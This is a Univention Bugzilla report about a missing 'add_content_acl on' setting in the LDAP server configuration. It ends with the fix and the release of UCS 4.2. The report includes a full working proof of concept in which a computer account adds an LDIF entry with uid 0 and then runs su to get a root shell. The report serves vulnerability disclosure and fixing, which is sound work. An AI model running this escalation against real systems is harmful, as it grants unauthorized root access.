Univention Bugzilla – Bug 41797
add add_content_acl on to slapd.conf
Last modified: 2021-06-23 07:29:08 CEST
The content of LDAP-ACL's are only evaluated if the database entry in slapd.conf contains "add_content_acl on". Memberservers/DC's can create arbitrary objects in various positions otherwise. As there are dependencies between UCS and UCS@school we release this part of Bug #41715 a little bit later. +++ This bug was initially created as a clone of Bug #41715 +++ Preconditions: Having a memberserver/slave/master/backup or any object underneath of cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base. root@xen3:~# eval "$(ucr shell)" root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base" Object created: cn=memberserver,cn=computers,dc=school,dc=local root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local # now PWN it $ cat posix_account.ldif dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local univentionAppID: foobar objectClass: univentionApp objectClass: posixAccount uid: hacker cn: hacker uidNumber: 0 gidNumber: 0 homeDirectory: /root loginShell: /bin/bash userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8= $ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local" $ su hacker Passwort: hacker@xen3:~# id uid=0(hacker) gid=0(root) Gruppen=0(root)
r75785 | Changelog Bug #41797 univention-ldap (13.0.2-1): r75784 | Bug #41797: add add_content_acl on configuration
Ok, I made the wording of the changelog entry a bit more verbose. Relevant documentation from slapd.conf(): =============================================================================== add_content_acl: Controls whether Add operations will perform ACL checks on the content of the entry being added. [...] =============================================================================== And slapd.access(5) says: =============================================================================== Also if Add content ACL checking has been configured on the database [...], add (=a) will be required on all of the attributes being added. ===============================================================================
UCS 4.2 has been released: https://docs.software-univention.de/release-notes-4.2-0-en.html https://docs.software-univention.de/release-notes-4.2-0-de.html If this error occurs again, please use "Clone This Bug".